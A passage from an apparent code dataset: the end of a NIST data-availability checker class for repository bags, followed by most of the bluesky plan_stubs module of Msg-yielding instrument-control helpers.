returned if the property is not included in the component metadata\n or if the URL does not match the base associated with the distribution\n service.\n\n :param cmp: either a dict containing the component metadata describing \n the data file or a string giving the file's download URL.\n \"\"\"\n dlurl = cmp\n if isinstance(cmp, Mapping):\n if 'downloadURL' not in cmp:\n return False\n dlurl = cmp['downloadURL']\n cmp = cmp.get('filepath', dlurl)\n\n try:\n (stat, msg) = self.head_url(dlurl)\n ok = stat >= 200 and stat < 300\n if not ok and self.log:\n self.log.debug(\"HEAD on %s: %s (%i)\", cmp, msg, stat)\n return ok\n except requests.RequestException as ex:\n if self.log:\n self.log.warning(\"Trouble accessing download URL: \" + str(ex) +\n \"\\n ({0})\".format(cmp))\n return False\n\n def available_as(self, cmp, strict=False, viadistrib=True):\n \"\"\"\n return an enumeration value indicating how the specified data file is \n found to be available. \n\n :param dict cmp: a dict containing the component metadata describing \n the data file\n :param bool strict: if True, don't assume if remote bag containing the\n file is available that the file is actually in the\n bag. Currently, this implementation will return\n False if the file is not available from any other\n source. 
\n :param bool viadistrib: if True, only check to see if the file is \n available via its downloadURL if the URL points\n to the PDR's distribution service. \n \"\"\"\n if self.available_in_bag(cmp):\n return self.AVAIL_IN_BAG\n if self.available_in_cached_bag(cmp):\n return self.AVAIL_IN_CACHED_BAG\n if (not viadistrib or self.has_pdr_url(cmp.get('downloadURL',''))) and \\\n self.available_via_url(cmp):\n return self.AVAIL_VIA_URL\n if not strict and self._distsvc and self.containing_bag_available(cmp):\n return self.AVAIL_IN_REMOTE_BAG\n return self.AVAIL_NOT\n\n def available(self, cmp, strict=False, viadistrib=True):\n \"\"\"\n return True if the specified data file is currently available somewhere.\n This function (using available_as()) will cycle through possible \n locations of the file, searching until it finds it. This includes:\n 1. the current bag\n 2. in a bag located in a local cache\n 3. at its download URL\n 4. in a remote bag available via the distribution service*\n\n When the file is found, True is returned; otherwise, False is returned.\n\n *in this implementation with location (4), the remote bag's contents \n are not examined; only the availability of that bag is checked. \n \"\"\"\n return self.available_as(cmp, strict, viadistrib) is not self.AVAIL_NOT\n \n def containing_bag_available(self, cmp):\n \"\"\"\n return True if the member bag that contains the specified component\n is available via the distribution service. An exception is raised \n if this checker was not configured with the distribution service \n endpoint configured or if the service is not available. \n\n The file can be specified either via its component metadata (as a \n dict) or directly by its filepath property (as a string). False is \n returned if either the filepath is not found in a cached bag, if \n the location of the bag cache directory is not known, or if the \n filepath property is not included in the given component metadata.\n\n :param cmp: either a dict containing the component metadata describing \n the data file or a string giving the file's filepath.\n \"\"\"\n if isinstance(cmp, Mapping):\n if 'filepath' not in cmp:\n return False\n cmp = cmp['filepath']\n\n mbagname = self.bag_location(cmp)\n if not mbagname:\n return False\n try:\n parts = parse_bag_name(mbagname)\n except ValueError as ex:\n if self.log:\n self.log.warning(\"data file listed as in bag with illegal name: \"+\n mbagname)\n return False\n parts[1] = parts[1] or \"0\"\n parts[1] = re.sub(r'_','.',parts[1])\n \n if not self._distsvc:\n raise StateException(\"Distribution service not configured\")\n bagsvc = BagDistribClient(parts[0], self._distsvc)\n\n try:\n matches = [f for f in bagsvc.list_for_version(parts[1])\n if f.startswith(mbagname+\".\")]\n return len(matches) > 0\n\n except DistribResourceNotFound as ex:\n if self.log:\n self.log.debug(\"No bags for %s found via bag service\", parts[0])\n return False\n\n except DistribServerError as ex:\n if self.log:\n self.log.error(\"query on %s: service connect error: %s\",\n mbagname, str(ex))\n return False\n\n except DistribServiceError as ex:\n if self.log:\n self.log.error(\"unexpected error while querying on %s: %s\",\n mbagname, str(ex))\n \n\n def unavailable_files(self, strict=False, viadistrib=True):\n \"\"\"\n return a list of the data file component filepaths that appear to \n be unavailable via any means. 
This is a check to make sure that all\n of the distributions listed in the NERDm record are either in the \n present bag or otherwise previously preserved and available; in this\n case, the returned list will be empty.\n\n :param bool strict: if True, don't assume if remote bag containing the\n file is available that the file is actually in the\n bag. Currently, this implementation will return\n False if the file is not available from any other\n source. \n :param bool viadistrib: if True, check a file's availability only if\n its download URL points to the PDR's \n distribution service. \n \"\"\"\n missing = []\n nerd = self.bag.nerdm_record(False)\n for cmp in nerd.get('components',[]):\n if \"dcat:Distribution\" not in cmp.get('@type',[]) or \\\n 'downloadURL' not in cmp:\n continue\n if viadistrib and 'downloadURL' in cmp and \\\n not self.has_pdr_url(cmp['downloadURL']):\n continue\n if not self.available(cmp, strict, False):\n missing.append(cmp.get('filepath') or cmp.get('downloadURL'))\n\n return missing\n\n def all_files_available(self, strict=False, viadistrib=True):\n \"\"\"\n return True if all of the data file components are available in some\n form. This is a check to make sure that all\n of the distributions listed in the NERDm record are either in the \n present bag or otherwise previously preserved and available; in this\n case, the returned list will be empty.\n\n :param bool viadistrib: if True, check only those files if its\n downloadURL if the URL points to the PDR's \n distribution service. \n \"\"\"\n return len(self.unavailable_files(strict, viadistrib)) == 0\n\n def unindexed_files(self, viadistrib=True):\n \"\"\"\n return the data file component filepaths that are missing from the \n mulitbag file lookup list. This is a check to make sure that all\n of the distributions listed in the NERDm record are findable either in \n the present bag or other member bags; in this case, the returned list \n will be empty.\n\n :param bool viadistrib: if True, check only those files if its\n downloadURL if the URL points to the PDR's \n distribution service. \n \"\"\"\n missing = []\n nerd = self.bag.nerdm_record(False)\n for cmp in nerd.get('components',[]):\n if \"dcat:Distribution\" not in cmp.get('@type',[]) or \\\n 'filepath' not in cmp:\n continue\n if viadistrib and 'downloadURL' in cmp and \\\n not self.has_pdr_url(cmp['downloadURL']):\n continue\n if not self.bag_location(cmp):\n missing.append(cmp.get('filepath') or cmp.get('downloadURL'))\n\n return missing\n\n def all_files_indexed(self, viadistrib=True):\n \"\"\"\n return True if all the data file components given in the NERDm metadata\n are included in the multibag file lookup list. This is a check to make \n sure that all of the distributions listed in the NERDm record are \n findable either in the present bag or other member bags.\n\n :param bool viadistrib: if True, check only those files if its\n downloadURL if the URL points to the PDR's \n distribution service. \n \"\"\"\n return len(self.unindexed_files(viadistrib)) == 0\n\n def check_all_data_files(self, strict=False, viadistrib=True):\n \"\"\"\n return True if all the data files described in the NERDm metadata are\n findable and available. This returns False if either \n all_files_indexed() or all_files_available() return False.\n\n :param bool viadistrib: if True, check only those files if its\n downloadURL if the URL points to the PDR's \n distribution service. 
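\n A short usage sketch (the bag, config, and log objects stand in for real ones):\n\n chk = DataChecker(bag, config, log)\n if not chk.check_all_data_files():\n log.error(\"some distributions are missing or not findable\")\n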
\n \"\"\"\n return self.all_files_indexed(viadistrib) and \\\n self.all_files_available(strict, viadistrib)\n\n","repo_name":"usnistgov/oar-pdr-py","sub_path":"python/nistoar/pdr/publish/bagger/datachecker.py","file_name":"datachecker.py","file_ext":"py","file_size_in_byte":18883,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"6744002980","text":"import itertools\nimport uuid\nfrom cycler import cycler\nimport operator\nfrom functools import reduce\nfrom collections.abc import Iterable\nimport time\nimport warnings\n\ntry:\n # cytools is a drop-in replacement for toolz, implemented in Cython\n from cytools import partition\nexcept ImportError:\n from toolz import partition\n\nfrom .protocols import Locatable, Triggerable, Status\nfrom .utils import (\n get_hinted_fields,\n merge_cycler,\n separate_devices,\n all_safe_rewind,\n Msg,\n ensure_generator,\n short_uid as _short_uid,\n)\n\n\ndef declare_stream(*objs, name=None, collect=False):\n \"\"\"\n Bundle future readings into a new Event document.\n\n Parameters\n ----------\n name : string\n name given to event stream, used to convenient identification\n collect : bool, optional\n collect as well as describe when declaring the stream\n default is `False`\n\n Yields\n ------\n msg : Msg\n Msg('create', name=name)\n\n See Also\n --------\n :func:`bluesky.plan_stubs.save`\n \"\"\"\n return (yield Msg('declare_stream', None, *separate_devices(objs), name=name, collect=collect))\n\n\ndef create(name='primary'):\n \"\"\"\n Bundle future readings into a new Event document.\n\n Parameters\n ----------\n name : string, optional\n name given to event stream, used to convenient identification\n default is 'primary'\n\n Yields\n ------\n msg : Msg\n Msg('create', name=name)\n\n See Also\n --------\n :func:`bluesky.plan_stubs.save`\n \"\"\"\n return (yield Msg('create', name=name))\n\n\ndef save():\n \"\"\"\n Close a bundle of readings and emit a completed Event document.\n\n Yields\n ------\n msg : Msg\n Msg('save')\n\n See Also\n --------\n :func:`bluesky.plan_stubs.create`\n \"\"\"\n return (yield Msg('save'))\n\n\ndef drop():\n \"\"\"\n Drop a bundle of readings without emitting a completed Event document.\n\n Yields\n ------\n msg : Msg\n Msg('drop')\n\n See Also\n --------\n :func:`bluesky.plan_stubs.save`\n :func:`bluesky.plan_stubs.create`\n \"\"\"\n return (yield Msg('drop'))\n\n\ndef read(obj):\n \"\"\"\n Take a reading and add it to the current bundle of readings.\n\n Parameters\n ----------\n obj : Device or Signal\n\n Yields\n ------\n msg : Msg\n Msg('read', obj)\n \"\"\"\n return (yield Msg('read', obj))\n\n\ndef monitor(obj, *, name=None, **kwargs):\n \"\"\"\n Asynchronously monitor for new values and emit Event documents.\n\n Parameters\n ----------\n obj : Signal\n args :\n passed through to ``obj.subscribe()``\n name : string, optional\n name of event stream; default is None\n kwargs :\n passed through to ``obj.subscribe()``\n\n Yields\n ------\n msg : Msg\n ``Msg('monitor', obj, *args, **kwargs)``\n\n See Also\n --------\n :func:`bluesky.plan_stubs.unmonitor`\n \"\"\"\n return (yield Msg('monitor', obj, name=name, **kwargs))\n\n\ndef unmonitor(obj):\n \"\"\"\n Stop monitoring.\n\n Parameters\n ----------\n obj : Signal\n\n Yields\n ------\n msg : Msg\n Msg('unmonitor', obj)\n\n See Also\n --------\n :func:`bluesky.plan_stubs.monitor`\n \"\"\"\n return (yield Msg('unmonitor', obj))\n\n\ndef null():\n \"\"\"\n Yield a no-op Message. 
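For example, ``yield from null()`` can be used as a placeholder step while sketching out a larger plan.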
(Primarily for debugging and testing.)\n\n Yields\n ------\n msg : Msg\n Msg('null')\n \"\"\"\n return (yield Msg('null'))\n\n\ndef abs_set(obj, *args, group=None, wait=False, **kwargs):\n \"\"\"\n Set a value. Optionally, wait for it to complete before continuing.\n\n Parameters\n ----------\n obj : Device\n group : string (or any hashable object), optional\n identifier used by 'wait'\n wait : boolean, optional\n If True, wait for completion before processing any more messages.\n False by default.\n args :\n passed to obj.set()\n kwargs :\n passed to obj.set()\n\n Yields\n ------\n msg : Msg\n\n See Also\n --------\n :func:`bluesky.plan_stubs.rel_set`\n :func:`bluesky.plan_stubs.wait`\n :func:`bluesky.plan_stubs.mv`\n \"\"\"\n if wait and group is None:\n group = str(uuid.uuid4())\n ret = yield Msg('set', obj, *args, group=group, **kwargs)\n if wait:\n yield Msg('wait', None, group=group)\n return ret\n\n\ndef rel_set(obj, *args, group=None, wait=False, **kwargs):\n \"\"\"\n Set a value relative to current value. Optionally, wait before continuing.\n\n Parameters\n ----------\n obj : Device\n group : string (or any hashable object), optional\n identifier used by 'wait'; None by default\n wait : boolean, optional\n If True, wait for completion before processing any more messages.\n False by default.\n args :\n passed to obj.set()\n kwargs :\n passed to obj.set()\n\n Yields\n ------\n msg : Msg\n\n See Also\n --------\n :func:`bluesky.plan_stubs.abs_set`\n :func:`bluesky.plan_stubs.wait`\n \"\"\"\n from .preprocessors import relative_set_wrapper\n\n return (\n yield from relative_set_wrapper(\n abs_set(obj, *args, group=group, wait=wait, **kwargs)\n )\n )\n\n\ndef mv(*args, group=None, **kwargs):\n \"\"\"\n Move one or more devices to a setpoint. Wait for all to complete.\n\n If more than one device is specified, the movements are done in parallel.\n\n Parameters\n ----------\n args :\n device1, value1, device2, value2, ...\n group : string, optional\n Used to mark these as a unit to be waited on.\n kwargs :\n passed to obj.set()\n\n Yields\n ------\n msg : Msg\n\n See Also\n --------\n :func:`bluesky.plan_stubs.abs_set`\n :func:`bluesky.plan_stubs.mvr`\n \"\"\"\n group = group or str(uuid.uuid4())\n status_objects = []\n\n cyl = reduce(operator.add, [cycler(obj, [val]) for obj, val in partition(2, args)])\n (step,) = merge_cycler(cyl)\n for obj, val in step.items():\n ret = yield Msg('set', obj, val, group=group, **kwargs)\n status_objects.append(ret)\n yield Msg('wait', None, group=group)\n return tuple(status_objects)\n\n\nmov = mv # synonym\n\n\ndef mvr(*args, group=None, **kwargs):\n \"\"\"\n Move one or more devices to a relative setpoint. 
Wait for all to complete.\n\n If more than one device is specified, the movements are done in parallel.\n\n Parameters\n ----------\n args :\n device1, value1, device2, value2, ...\n group : string, optional\n Used to mark these as a unit to be waited on.\n kwargs :\n passed to obj.set()\n\n Yields\n ------\n msg : Msg\n\n See Also\n --------\n :func:`bluesky.plan_stubs.rel_set`\n :func:`bluesky.plan_stubs.mv`\n \"\"\"\n objs = []\n for obj, val in partition(2, args):\n objs.append(obj)\n\n from .preprocessors import relative_set_decorator\n\n @relative_set_decorator(objs)\n def inner_mvr():\n return (yield from mv(*args, group=group, **kwargs))\n\n return (yield from inner_mvr())\n\n\nmovr = mvr # synonym\n\n\ndef rd(obj, *, default_value=0):\n \"\"\"Reads a single-value non-triggered object\n\n This is a helper plan to get the scalar value out of a Device\n (such as an EpicsMotor or a single EpicsSignal).\n\n For devices that implement the Locatable protocol, the location is canonical\n and is returned without parsing the read keys.\n\n For devices that have more than one read key the following rules are used:\n\n - if exactly 1 field is hinted that value is used\n - if no fields are hinted and there is exactly 1 value in the\n reading that value is used\n - if more than one field is hinted an Exception is raised\n - if no fields are hinted and there is more than one key in the reading an\n Exception is raised\n\n The devices is not triggered and this plan does not create any Events\n\n Parameters\n ----------\n obj : Device\n The device to be read\n\n default_value : Any\n The value to return when not running in a \"live\" RunEngine.\n This come ups when ::\n\n ret = yield Msg('read', obj)\n assert ret is None\n\n the plan is passed to `list` or some other iterator that\n repeatedly sends `None` into the plan to advance the\n generator.\n\n Returns\n -------\n val : Any or None\n The \"single\" value of the device\n\n \"\"\"\n # Location is canonical if it exists\n if isinstance(obj, Locatable):\n location = yield Msg(\"locate\", obj)\n if location is None:\n # list-ify mode\n return default_value\n else:\n return location[\"readback\"]\n\n hints = get_hinted_fields(obj)\n if len(hints) > 1:\n msg = (\n f\"Your object {obj} ({obj.name}.{getattr(obj, 'dotted_name', '')}) \"\n f\"has {len(hints)} items hinted ({hints}). We do not know how to \"\n \"pick out a single value. Please adjust the hinting by setting the \"\n \"kind of the components of this device or by reading one of its components\"\n )\n raise ValueError(msg)\n elif len(hints) == 0:\n hint = None\n if hasattr(obj, \"read_attrs\"):\n if len(obj.read_attrs) != 1:\n msg = (\n f\"Your object {obj} ({obj.name}.{getattr(obj, 'dotted_name', '')}) \"\n f\"and has {len(obj.read_attrs)} read attrs. We do not know how to \"\n \"pick out a single value. Please adjust the hinting/read_attrs by \"\n \"setting the kind of the components of this device or by reading one \"\n \"of its components\"\n )\n\n raise ValueError(msg)\n # len(hints) == 1\n else:\n (hint,) = hints\n\n ret = yield from read(obj)\n\n # list-ify mode\n if ret is None:\n return default_value\n\n if hint is not None:\n return ret[hint][\"value\"]\n\n # handle the no hint 1 field case\n try:\n (data,) = ret.values()\n except ValueError as er:\n msg = (\n f\"Your object {obj} ({obj.name}.{getattr(obj, 'dotted_name', '')}) \"\n f\"and has {len(ret)} read values. We do not know how to pick out a \"\n \"single value. 
Please adjust the hinting/read_attrs by setting the \"\n \"kind of the components of this device or by reading one of its components\"\n )\n\n raise ValueError(msg) from er\n else:\n return data[\"value\"]\n\n\ndef stop(obj):\n \"\"\"\n Stop a device.\n\n Parameters\n ----------\n obj : Device\n\n Yields\n ------\n msg : Msg\n \"\"\"\n return (yield Msg('stop', obj))\n\n\ndef trigger(obj, *, group=None, wait=False):\n \"\"\"\n Trigger and acquisition. Optionally, wait for it to complete.\n\n Parameters\n ----------\n obj : Device\n group : string (or any hashable object), optional\n identifier used by 'wait'; None by default\n wait : boolean, optional\n If True, wait for completion before processing any more messages.\n False by default.\n\n Yields\n ------\n msg : Msg\n \"\"\"\n ret = yield Msg('trigger', obj, group=group)\n if wait:\n yield Msg('wait', None, group=group)\n return ret\n\n\ndef sleep(time):\n \"\"\"\n Tell the RunEngine to sleep, while asynchronously doing other processing.\n\n This is not the same as ``import time; time.sleep()`` because it allows\n other actions, like interruptions, to be processed during the sleep.\n\n Parameters\n ----------\n time : float\n seconds\n\n Yields\n ------\n msg : Msg\n Msg('sleep', None, time)\n \"\"\"\n return (yield Msg('sleep', None, time))\n\n\ndef wait(group=None, *, timeout=None):\n \"\"\"\n Wait for all statuses in a group to report being finished.\n\n Parameters\n ----------\n group : string (or any hashable object), optional\n Identifier given to `abs_set`, `rel_set`, `trigger`; None by default\n\n Yields\n ------\n msg : Msg\n Msg('wait', None, group=group)\n \"\"\"\n return (yield Msg('wait', None, group=group, timeout=timeout))\n\n\n_wait = wait # for internal references to avoid collision with 'wait' kwarg\n\n\ndef checkpoint():\n \"\"\"\n If interrupted, rewind to this point.\n\n Yields\n ------\n msg : Msg\n Msg('checkpoint')\n\n See Also\n --------\n :func:`bluesky.plan_stubs.clear_checkpoint`\n \"\"\"\n return (yield Msg('checkpoint'))\n\n\ndef clear_checkpoint():\n \"\"\"\n Designate that it is not safe to resume. 
If interrupted or paused, abort.\n\n Yields\n ------\n msg : Msg\n Msg('clear_checkpoint')\n\n See Also\n --------\n :func:`bluesky.plan_stubs.checkpoint`\n \"\"\"\n return (yield Msg('clear_checkpoint'))\n\n\ndef pause():\n \"\"\"\n Pause and wait for the user to resume.\n\n Yields\n ------\n msg : Msg\n Msg('pause')\n\n See Also\n --------\n :func:`bluesky.plan_stubs.deferred_pause`\n :func:`bluesky.plan_stubs.sleep`\n \"\"\"\n return (yield Msg('pause', None, defer=False))\n\n\ndef deferred_pause():\n \"\"\"\n Pause at the next checkpoint.\n\n Yields\n ------\n msg : Msg\n Msg('pause', defer=True)\n\n See Also\n --------\n :func:`bluesky.plan_stubs.pause`\n :func:`bluesky.plan_stubs.sleep`\n \"\"\"\n return (yield Msg('pause', None, defer=True))\n\n\ndef input_plan(prompt=''):\n \"\"\"\n Prompt the user for text input.\n\n Parameters\n ----------\n prompt : str\n prompt string, e.g., 'enter user name' or 'enter next position'\n\n Yields\n ------\n msg : Msg\n Msg('input', prompt=prompt)\n \"\"\"\n return (yield Msg('input', prompt=prompt))\n\n\ndef kickoff(obj, *, group=None, wait=False, **kwargs):\n \"\"\"\n Kickoff a fly-scanning device.\n\n Parameters\n ----------\n obj : fly-able\n Device with 'kickoff', 'complete', and 'collect' methods\n group : string (or any hashable object), optional\n identifier used by 'wait'\n wait : boolean, optional\n If True, wait for completion before processing any more messages.\n False by default.\n kwargs\n passed through to ``obj.kickoff()``\n\n Yields\n ------\n msg : Msg\n Msg('kickoff', obj)\n\n See Also\n --------\n :func:`bluesky.plan_stubs.complete`\n :func:`bluesky.plan_stubs.collect`\n :func:`bluesky.plan_stubs.wait`\n \"\"\"\n ret = (yield Msg('kickoff', obj, group=group, **kwargs))\n if wait:\n yield from _wait(group=group)\n return ret\n\n\ndef complete(obj, *, group=None, wait=False, **kwargs):\n \"\"\"\n Tell a flyer, 'stop collecting, whenever you are ready'.\n\n The flyer returns a status object. Some flyers respond to this\n command by stopping collection and returning a finished status\n object immediately. Other flyers finish their given course and\n finish whenever they finish, irrespective of when this command is\n issued.\n\n Parameters\n ----------\n obj : fly-able\n Device with 'kickoff', 'complete', and 'collect' methods\n group : string (or any hashable object), optional\n identifier used by 'wait'\n wait : boolean, optional\n If True, wait for completion before processing any more messages.\n False by default.\n kwargs\n passed through to ``obj.complete()``\n\n Yields\n ------\n msg : Msg\n a 'complete' Msg and maybe a 'wait' message\n\n See Also\n --------\n :func:`bluesky.plan_stubs.kickoff`\n :func:`bluesky.plan_stubs.collect`\n :func:`bluesky.plan_stubs.wait`\n \"\"\"\n ret = yield Msg('complete', obj, group=group, **kwargs)\n if wait:\n yield from _wait(group=group)\n return ret\n\n\ndef collect(obj, *, stream=False, return_payload=True, name=None):\n \"\"\"\n Collect data cached by a fly-scanning device and emit documents.\n\n Parameters\n ----------\n obj : fly-able\n Device with 'kickoff', 'complete', and 'collect' methods\n stream : boolean, optional\n If False (default), emit Event documents in one bulk dump. If True,\n emit events one at time.\n return_payload: boolean, optional\n If True (default), return the collected Events. 
If False, return None.\n        Using ``stream=True`` and ``return_payload=False`` together avoids\n        accumulating the documents in memory: they are emitted as they are\n        collected.\n    name: str, optional\n        If not None, will collect for the named stream specifically, else collect will be performed\n        on all streams.\n\n    Yields\n    ------\n    msg : Msg\n        Msg('collect', obj)\n\n    See Also\n    --------\n    :func:`bluesky.plan_stubs.kickoff`\n    :func:`bluesky.plan_stubs.complete`\n    :func:`bluesky.plan_stubs.wait`\n    \"\"\"\n    return (yield Msg('collect', obj, stream=stream, return_payload=return_payload, name=name))\n\n\ndef configure(obj, *args, **kwargs):\n    \"\"\"\n    Change Device configuration and emit an updated Event Descriptor document.\n\n    Parameters\n    ----------\n    obj : Device\n    args\n        passed through to ``obj.configure()``\n    kwargs\n        passed through to ``obj.configure()``\n\n    Yields\n    ------\n    msg : Msg\n        ``Msg('configure', obj, *args, **kwargs)``\n    \"\"\"\n    return (yield Msg('configure', obj, *args, **kwargs))\n\n\ndef stage(obj, *, group=None, wait=None):\n    \"\"\"\n    'Stage' a device (i.e., prepare it for use, 'arm' it).\n\n    Parameters\n    ----------\n    obj : Device\n    group : string (or any hashable object), optional\n        identifier used by 'wait'; None by default\n    wait : boolean, optional\n        If True, wait for completion before processing any more messages.\n        False by default.\n\n    Yields\n    ------\n    msg : Msg\n\n    See Also\n    --------\n    :func:`bluesky.plan_stubs.unstage`\n    :func:`bluesky.plan_stubs.stage_all`\n    \"\"\"\n    ret = yield Msg('stage', obj, group=group)\n    old_style = not isinstance(ret, Status)\n    if old_style:\n        if (wait is None) or wait:\n            # Old-style devices will just block. We do not need to explicitly wait.\n            pass\n        else: # wait is False-y\n            # No way to tell old-style devices not to wait\n            raise RuntimeError(f\"{obj}: Is an old style device and cannot be told not to wait\")\n    else:\n        if wait:\n            yield Msg('wait', None, group=group)\n    return ret\n\n\ndef stage_all(*args, group=None):\n    \"\"\"\n    'Stage' one or more devices (i.e., prepare them for use, 'arm' them).\n\n    Parameters\n    ----------\n    args :\n        device1, device2, device3, ...\n    group : string (or any hashable object), optional\n        identifier used by 'wait'; None by default\n\n    Yields\n    ------\n    msg : Msg\n\n    See Also\n    --------\n    :func:`bluesky.plan_stubs.stage`\n    :func:`bluesky.plan_stubs.unstage_all`\n    \"\"\"\n    group = group or str(uuid.uuid4())\n    status_objects = []\n\n    for obj in args:\n        ret = yield Msg('stage', obj, group=group)\n        if isinstance(ret, Status):\n            status_objects.append(ret)\n\n    if status_objects:\n        yield Msg('wait', None, group=group)\n\n\ndef unstage(obj, *, group=None, wait=None):\n    \"\"\"\n    'Unstage' a device (i.e., put it in standby, 'disarm' it).\n\n    Parameters\n    ----------\n    obj : Device\n    group : string (or any hashable object), optional\n        identifier used by 'wait'; None by default\n    wait : boolean, optional\n        If True, wait for completion before processing any more messages.\n        False by default.\n\n    Yields\n    ------\n    msg : Msg\n\n    See Also\n    --------\n    :func:`bluesky.plan_stubs.stage`\n    :func:`bluesky.plan_stubs.unstage_all`\n    \"\"\"\n    ret = yield Msg('unstage', obj, group=group)\n    old_style = not isinstance(ret, Status)\n    if old_style:\n        if (wait is None) or wait:\n            # Old-style devices will just block. 
We do not need to explicitly wait.\n            pass\n        else:\n            # No way to tell old-style devices not to wait\n            raise RuntimeError(f\"{obj}: Is an old style device and cannot be told not to wait\")\n    else:\n        if wait:\n            yield Msg('wait', None, group=group)\n    return ret\n\n\ndef unstage_all(*args, group=None):\n    \"\"\"\n    'Unstage' one or more devices (i.e., put them in standby, 'disarm' them).\n\n    Parameters\n    ----------\n    args :\n        device1, device2, device3, ...\n    group : string (or any hashable object), optional\n        identifier used by 'wait'; None by default\n\n    Yields\n    ------\n    msg : Msg\n\n    See Also\n    --------\n    :func:`bluesky.plan_stubs.unstage`\n    :func:`bluesky.plan_stubs.stage_all`\n    \"\"\"\n    group = group or str(uuid.uuid4())\n    status_objects = []\n\n    for obj in args:\n        ret = yield Msg('unstage', obj, group=group)\n        if isinstance(ret, Status):\n            status_objects.append(ret)\n\n    if status_objects:\n        yield Msg('wait', None, group=group)\n\n\ndef subscribe(name, func):\n    \"\"\"\n    Subscribe to the stream of emitted documents.\n\n    Parameters\n    ----------\n    name : {'all', 'start', 'descriptor', 'event', 'stop'}\n    func : callable\n        Expected signature: ``f(name, doc)`` where ``name`` is one of the\n        strings above ('all', 'start', ...) and ``doc`` is a dict\n\n    Yields\n    ------\n    msg : Msg\n        Msg('subscribe', None, func, name)\n\n    See Also\n    --------\n    :func:`bluesky.plan_stubs.unsubscribe`\n    \"\"\"\n    return (yield Msg('subscribe', None, func, name))\n\n\ndef unsubscribe(token):\n    \"\"\"\n    Remove a subscription.\n\n    Parameters\n    ----------\n    token : int\n        token returned by processing a 'subscribe' message\n\n    Yields\n    ------\n    msg : Msg\n        Msg('unsubscribe', token=token)\n\n    See Also\n    --------\n    :func:`bluesky.plan_stubs.subscribe`\n    \"\"\"\n    return (yield Msg('unsubscribe', token=token))\n\n\ndef install_suspender(suspender):\n    \"\"\"\n    Install a suspender during a plan.\n\n    Parameters\n    ----------\n    suspender : :class:`bluesky.suspenders.SuspenderBase`\n        The suspender to install\n\n    Yields\n    ------\n    msg : Msg\n        Msg('install_suspender', None, suspender)\n\n    See Also\n    --------\n    :func:`bluesky.plan_stubs.remove_suspender`\n    \"\"\"\n    return (yield Msg('install_suspender', None, suspender))\n\n\ndef remove_suspender(suspender):\n    \"\"\"\n    Remove a suspender during a plan.\n\n    Parameters\n    ----------\n    suspender : :class:`bluesky.suspenders.SuspenderBase`\n        The suspender to remove\n\n    Yields\n    ------\n    msg : Msg\n        Msg('remove_suspender', None, suspender)\n\n    See Also\n    --------\n    :func:`bluesky.plan_stubs.install_suspender`\n    \"\"\"\n    return (yield Msg('remove_suspender', None, suspender))\n\n\ndef open_run(md=None):\n    \"\"\"\n    Mark the beginning of a new 'run'. Emit a RunStart document.\n\n    Parameters\n    ----------\n    md : dict, optional\n        metadata\n\n    Yields\n    ------\n    msg : Msg\n        ``Msg('open_run', **md)``\n\n    See Also\n    --------\n    :func:`bluesky.plan_stubs.close_run`\n    \"\"\"\n    return (yield Msg('open_run', **(md or {})))\n
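\n\n# Illustrative pairing (``det`` is a hypothetical readable device): a run typically\n# brackets its readings between open_run and close_run:\n#\n#     def one_reading(det):\n#         yield from open_run({'plan_name': 'one_reading'})\n#         yield from trigger_and_read([det])\n#         yield from close_run()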
\n\n\ndef close_run(exit_status=None, reason=None):\n    \"\"\"\n    Mark the end of the current 'run'. Emit a RunStop document.\n\n    Parameters\n    ----------\n    exit_status : {None, 'success', 'abort', 'fail'}\n        The exit status to report in the Stop document\n    reason : str, optional\n        Long-form description of why the run ended\n\n    Yields\n    ------\n    msg : Msg\n        Msg('close_run')\n\n    See Also\n    --------\n    :func:`bluesky.plan_stubs.open_run`\n    \"\"\"\n    return (yield Msg('close_run', exit_status=exit_status, reason=reason))\n\n\ndef wait_for(futures, **kwargs):\n    \"\"\"\n    Low-level: wait for a list of ``asyncio.Future`` objects to set (complete).\n\n    Parameters\n    ----------\n    futures : collection\n        collection of asyncio.Future objects\n    kwargs\n        passed through to ``asyncio.wait()``\n\n    Yields\n    ------\n    msg : Msg\n        ``Msg('wait_for', None, futures, **kwargs)``\n\n    See Also\n    --------\n    :func:`bluesky.plan_stubs.wait`\n    \"\"\"\n    return (yield Msg('wait_for', None, futures, **kwargs))\n\n\ndef trigger_and_read(devices, name='primary'):\n    \"\"\"\n    Trigger and read a list of detectors and bundle readings into one Event.\n\n    Parameters\n    ----------\n    devices : iterable\n        devices to trigger (if they have a trigger method) and then read\n    name : string, optional\n        event stream name, a convenient human-friendly identifier; default\n        name is 'primary'\n\n    Yields\n    ------\n    msg : Msg\n        messages to 'trigger', 'wait' and 'read'\n    \"\"\"\n    from .preprocessors import contingency_wrapper\n    # If devices is empty, don't emit 'create'/'save' messages.\n    if not devices:\n        yield from null()\n    devices = separate_devices(devices) # remove redundant entries\n    rewindable = all_safe_rewind(devices) # if devices can be re-triggered\n\n    def inner_trigger_and_read():\n        grp = _short_uid('trigger')\n        no_wait = True\n        for obj in devices:\n            if isinstance(obj, Triggerable):\n                no_wait = False\n                yield from trigger(obj, group=grp)\n        # Skip 'wait' if none of the devices implemented a trigger method.\n        if not no_wait:\n            yield from wait(group=grp)\n        yield from create(name)\n\n        def read_plan():\n            ret = {} # collect and return readings to give plan access to them\n            for obj in devices:\n                reading = (yield from read(obj))\n                if reading is not None:\n                    ret.update(reading)\n            return ret\n\n        def standard_path():\n            yield from save()\n\n        def exception_path(exp):\n            yield from drop()\n            raise exp\n\n        ret = yield from contingency_wrapper(\n            read_plan(),\n            except_plan=exception_path,\n            else_plan=standard_path\n        )\n        return ret\n\n    from .preprocessors import rewindable_wrapper\n    return (yield from rewindable_wrapper(inner_trigger_and_read(),\n                                          rewindable))\n\n\ndef broadcast_msg(command, objs, *args, **kwargs):\n    \"\"\"\n    Generate many copies of a message, applying it to a list of devices.\n\n    Parameters\n    ----------\n    command : string\n    objs : iterable\n    ``*args``\n        args for message\n    ``**kwargs``\n        kwargs for message\n\n    Yields\n    ------\n    msg : Msg\n    \"\"\"\n    return_vals = []\n    for o in objs:\n        ret = yield Msg(command, o, *args, **kwargs)\n        return_vals.append(ret)\n\n    return return_vals\n\n\ndef repeater(n, gen_func, *args, **kwargs):\n    \"\"\"\n    Generate n chained copies of the messages from gen_func\n\n    Parameters\n    ----------\n    n : int or None\n        total number of repetitions; if None, infinite\n    gen_func : callable\n        returns generator instance\n    ``*args``\n        args for gen_func\n    ``**kwargs``\n        kwargs for gen_func\n\n    Yields\n    ------\n    msg : Msg\n\n    See Also\n    --------\n    